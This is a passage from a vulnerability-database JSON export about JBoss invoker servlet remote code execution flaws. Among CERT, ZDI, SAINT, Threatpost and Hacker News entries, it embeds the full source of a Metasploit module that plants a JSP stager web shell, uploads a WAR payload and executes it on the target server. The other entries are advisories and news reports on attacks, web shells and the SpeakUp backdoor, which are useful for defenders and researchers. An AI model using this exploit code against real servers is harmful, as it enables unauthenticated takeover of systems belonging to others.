"obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036"], "modified": "2007-02-21T22:50:00", "id": "VU:632656", "href": 
"https://www.kb.cert.org/vuls/id/632656", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:15", "description": "", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "packetstorm", "title": "JBoss DeploymentFileRepository WAR Deployment", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-1036"], "modified": "2012-09-05T00:00:00", "id": "PACKETSTORM:116241", "href": "https://packetstormsecurity.com/files/116241/JBoss-DeploymentFileRepository-WAR-Deployment.html", "sourceData": "`require 'msf/core' \n \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /JBoss/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)', \n'Description' => %q{ \nThis module can be used to execute a payload on JBoss servers that have an \nexposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking \nthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed \nto finally upload the selected payload to the target. The DeploymentFileRepository \nmethods are only available on Jboss 4.x and 5.x. 
\n}, \n'Author' => [ \n'Patrick Hof', # Vulnerability discovery, analysis and PoC \n'Jens Liebchen', # Vulnerability discovery, analysis and PoC \n'h0ng10' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2007-1036' ], \n[ 'OSVDB', '33744' ], \n[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], \n], \n'DisclosureDate' => 'Feb 20 2007', \n'Privileged' => true, \n'Platform' => ['java', 'win', 'linux' ], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => \n[ \n \n# do target detection but java meter by default \n[ 'Automatic', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n}, \n], \n \n# \n# Platform specific targets \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n}, \n], \n \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n}, \n], \n], \n \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]), \nOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]), \nOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]), \n], self.class) \n \nend \n \ndef check \nres = send_serialized_request('version.bin') \nif (res.nil?) or (res.code != 200) \nprint_error(\"Unable to request version, returned http code is: #{res.code.to_s}\") \nreturn Exploit::CheckCode::Unknown \nend \n \n# Check if the version is supported by this exploit \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ \n \nif res.body =~ /ServletException/ # Simple check, if we caused an exception. 
\nprint_status(\"Target seems vulnerable, but the used JBoss version is not supported by this exploit\") \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nmytarget = target \n \nif (target.name =~ /Automatic/) \nmytarget = auto_target \nfail_with(\"Unable to automatically select a target\") if not mytarget \nprint_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\") \nelse \nprint_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\") \nend \n \n \n# We use a already serialized stager to deploy the final payload \nregex_stager_app_base = rand_text_alpha(14) \nregex_stager_jsp_name = rand_text_alpha(14) \nname_parameter = rand_text_alpha(8) \ncontent_parameter = rand_text_alpha(8) \nstager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\" \nstager_code = \"A\" * 810 # 810 is the size of the stager in the serialized request \n \nreplace_values = { \n'regex_app_base' => regex_stager_app_base, \n'regex_jsp_name' => regex_stager_jsp_name, \nstager_code => generate_stager(name_parameter, content_parameter) \n} \n \nprint_status(\"Deploying stager\") \nsend_serialized_request('installstager.bin', replace_values) \nprint_status(\"Calling stager: #{stager_uri}\") \ncall_uri_mtimes(stager_uri, 5, 'GET') \n \n# Generate the WAR with the payload which will be uploaded through the stager \napp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) \njsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) \n \nwar_data = payload.encoded_war({ \n:app_name => app_base, \n:jsp_name => jsp_name, \n:arch => mytarget.arch, \n:platform => mytarget.platform \n}).to_s \n \nb64_war = Rex::Text.encode_base64(war_data) \nprint_status(\"Uploading payload through stager\") \nres = send_request_cgi({ \n'uri' => stager_uri, \n'method' => \"POST\", \n'vars_post' => \n{ \nname_parameter => app_base, \ncontent_parameter => b64_war \n} \n}, 20) \n \npayload_uri = \"/#{app_base}/#{jsp_name}.jsp\" 
\nprint_status(\"Calling payload: \" + payload_uri) \nres = call_uri_mtimes(payload_uri,5, 'GET') \n \n# Remove the payload through stager \nprint_status(\"Removing payload through stager\") \ndelete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\" \nres = send_request_cgi( \n{'uri' => delete_payload_uri, \n}) \n \n# Remove the stager \nprint_status(\"Removing stager\") \nsend_serialized_request('removestagerfile.bin', replace_values) \nsend_serialized_request('removestagerdirectory.bin', replace_values) \n \nhandler \nend \n \ndef generate_stager(name_param, content_param) \nwar_file = rand_text_alpha(4+rand(4)) \nfile_content = rand_text_alpha(4+rand(4)) \njboss_home = rand_text_alpha(4+rand(4)) \ndecoded_content = rand_text_alpha(4+rand(4)) \npath = rand_text_alpha(4+rand(4)) \nfos = rand_text_alpha(4+rand(4)) \nname = rand_text_alpha(4+rand(4)) \nfile = rand_text_alpha(4+rand(4)) \n \nstager_script = <<-EOT \n<%@page import=\"java.io.*, \njava.util.*, \nsun.misc.BASE64Decoder\" \n%> \n<% \nString #{file_content} = \"\"; \nString #{war_file} = \"\"; \nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\"); \nif (request.getParameter(\"#{content_param}\") != null){ \ntry { \n#{file_content} = request.getParameter(\"#{content_param}\"); \n#{war_file} = request.getParameter(\"#{name_param}\"); \nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content}); \nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\"; \nFileOutputStream #{fos} = new FileOutputStream(#{path}); \n#{fos}.write(#{decoded_content}); \n#{fos}.close(); \n} \ncatch(Exception e) {} \n} \nelse { \ntry{ \nString #{name} = request.getParameter(\"#{name_param}\"); \nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\"; \nnew File(#{file}).delete(); \n} \ncatch(Exception e) {} \n} \n \n%> \nEOT \n \n# The script must be exactly 810 characters long, otherwise we might have serialization issues \n# Therefore we fill the rest wit 
spaces \nspaces = \" \" * (810 - stager_script.length) \nstager_script << spaces \nend \n \n \ndef send_serialized_request(file_name , replace_params = {}) \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"jboss_jmxinvoker\", \"DeploymentFileRepository\", file_name) \ndata = File.open( path, \"rb\" ) { |fd| data = fd.read(fd.stat.size) } \n \nreplace_params.each { |key, value| data.gsub!(key, value) } \n \nres = send_request_cgi({ \n'uri' => target_uri.path, \n'method' => 'POST', \n'data' => data, \n'headers' => \n{ \n'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation', \n'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' \n} \n}, 25) \n \n \nif (not res) or (res.code != 200) \nprint_error(\"Failed: Error requesting preserialized request #{file_name}\") \nreturn nil \nend \n \nres \nend \n \n \ndef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil) \n# JBoss might need some time for the deployment. Try 5 times at most and \n# wait 5 seconds inbetween tries \nnum_attempts.times do |attempt| \nif (verb == \"POST\") \nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb, \n'data' => data \n}, 5) \nelse \nuri += \"?#{data}\" unless data.nil? 
\nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb \n}, 30) \nend \n \nmsg = nil \nif (!res) \nmsg = \"Execution failed on #{uri} [No Response]\" \nelsif (res.code < 200 or res.code >= 300) \nmsg = \"http request failed to #{uri} [#{res.code}]\" \nelsif (res.code == 200) \nprint_status(\"Successfully called '#{uri}'\") if datastore['VERBOSE'] \nreturn res \nend \n \nif (attempt < num_attempts - 1) \nmsg << \", retrying in 5 seconds...\" \nprint_status(msg) if datastore['VERBOSE'] \nselect(nil, nil, nil, 5) \nelse \nprint_error(msg) \nreturn res \nend \nend \nend \n \n \ndef auto_target \nprint_status(\"Attempting to automatically select a target\") \n \nplat = detect_platform() \narch = detect_architecture() \n \nreturn nil if (not arch or not plat) \n \n# see if we have a match \ntargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) } \n \n# no matching target found \nreturn nil \nend \n \n \n# Try to autodetect the target platform \ndef detect_platform \nprint_status(\"Attempting to automatically detect the platform\") \nres = send_serialized_request(\"osname.bin\") \n \nif (res.body =~ /(Linux|FreeBSD|Windows)/i) \nos = $1 \nif (os =~ /Linux/i) \nreturn 'linux' \nelsif (os =~ /FreeBSD/i) \nreturn 'linux' \nelsif (os =~ /Windows/i) \nreturn 'win' \nend \nend \nnil \nend \n \n \n# Try to autodetect the architecture \ndef detect_architecture() \nprint_status(\"Attempting to automatically detect the architecture\") \nres = send_serialized_request(\"osarch.bin\") \nif (res.body =~ /(i386|x86)/i) \narch = $1 \nif (arch =~ /i386|x86/i) \nreturn ARCH_X86 \n# TODO, more \nend \nend \nnil \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116241/jboss_invoke_deploy.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:47", "description": "Attackers are exploiting a two-year-old vulnerability in JBoss 
Application Servers that enables a hacker to remotely get a shell on a vulnerable webserver. The number of infections has surged since[ exploit code called pwn.jsp](<http://blog.imperva.com/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection.html>) was publicly disclosed Oct. 4.\n\nResearchers at Imperva said that a number of government and education websites have been compromised, as indicated by data collected through the company\u2019s honeypots. An attacker with remote shell access can inject code into a website run by the server or hunt and peck for files stored on the machine and extract them.\n\nThe vulnerability in the HTTP Invoker service that provides RMI/HTTP access to Enterprise Java Beans, was discovered in 2011 and presented at a number of security events that year.\n\n\u201cThe vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server,\u201d said Imperva\u2019s Barry Shteiman. \u201cOnce the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that application server.\u201d\n\nOn Sept. 16, the National Vulnerability Database issued an [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>) warning of a remote code execution bug affecting HP ProCurve Manager, network management software. The vulnerability was given the NVD\u2019s highest criticality ranking of 10. 
Since then, other products running the affected JBoss Application Server have been identified, including some security software.\n\nWithin three weeks, an exploit was added to [exploit-db](<http://www.exploit-db.com/exploits/28713/>) that successfully gained shell against a product running JBoss 4.0.5.\n\n\u201cImmediately thereafter, we had witnessed a surge in JBoss hacking, which manifested in malicious traffic originating from the infected servers and observed in Imperva\u2019s honeypot array,\u201d Shteiman said.\n\nAccording to Imperva\u2019s analysis, the vulnerability lies in the Invoker service, which operates at the remote management level enabling applications to access the server. The Invoker improperly exposes the management interface, Shteiman said.\n\nCompounding the problem is that in addition to the pwn.jsp shell, Shteiman said there is another more sophisticated shell available to attackers.\n\n\u201cIn these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities,\u201d he said.\n\nImperva also said that the number of webservers running JBoss software has tripled since the initial vulnerability research was made public.\n", "cvss3": {}, "published": "2013-11-19T16:07:59", "type": "threatpost", "title": "JBoss AS Attacks Up Since Exploit Code Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:18:24", "id": "THREATPOST:7E20261F9330304969941B4755E98BAA", "href": "https://threatpost.com/jboss-attacks-up-since-exploit-code-disclosure/102971/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux 
servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. 
That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. 
The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; an Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[Figure: SpeakUp\u2019s daily infection rate]\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. 
According to [XMRHunter](<https://www.xmrhunter.com/>), the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[Figure: SpeakUp has no detections in VirusTotal.]\n\nThe initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. 
\u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftsmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and GitHub projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of times in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers._\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:01:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus and Application Lifecycle Management. Authentication is not required to exploit this vulnerability. The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. 
An unauthenticated attacker can post a marshalled object allowing them to install an arbitrary application on the target server. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user in HP PCM Plus and with administrative privileges on Application Lifecycle Management.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ and Application Lifecycle Management JBoss Invoker Servlets Marshalled Object Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-229", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-229/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:59", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. 
The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:73B78E4CC6A84900DDFE755805A5092F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. 
\n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:F331FA17751309C5BD461AF4E8A90312", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:17", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. 
The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:34", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. 
\n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitrary Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:12", "description": "[Cyber security](<http://thehackernews.com/search/label/cyber%20security>) of many organizations is being attacked at 
an extremely high rate this month, and another alarming cyber crime report became public today.\n\nA widely unpatched, two-year-old critical [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in JBoss Application Server (AS) enables an attacker to remotely get a shell on a vulnerable web server.\n\nJBoss Application Server is a very popular open-source Java EE-based application server; it was designed by JBoss, now a division of Red Hat. In late 2012, JBoss AS was named \"_wildFly_\". Since disclosure of the [exploit code](<http://thehackernews.com/search/label/exploit>), many products running the affected JBoss Application Server have been impacted, including some security software.\n\nTens of thousands of enterprise data center servers are vulnerable to this attack, with at least 500 actively compromised, according to the Imperva report. Many systems administrators have yet to properly configure their servers to mitigate the threat, and the number of potential targets has increased over time, making the exploit even more attractive to 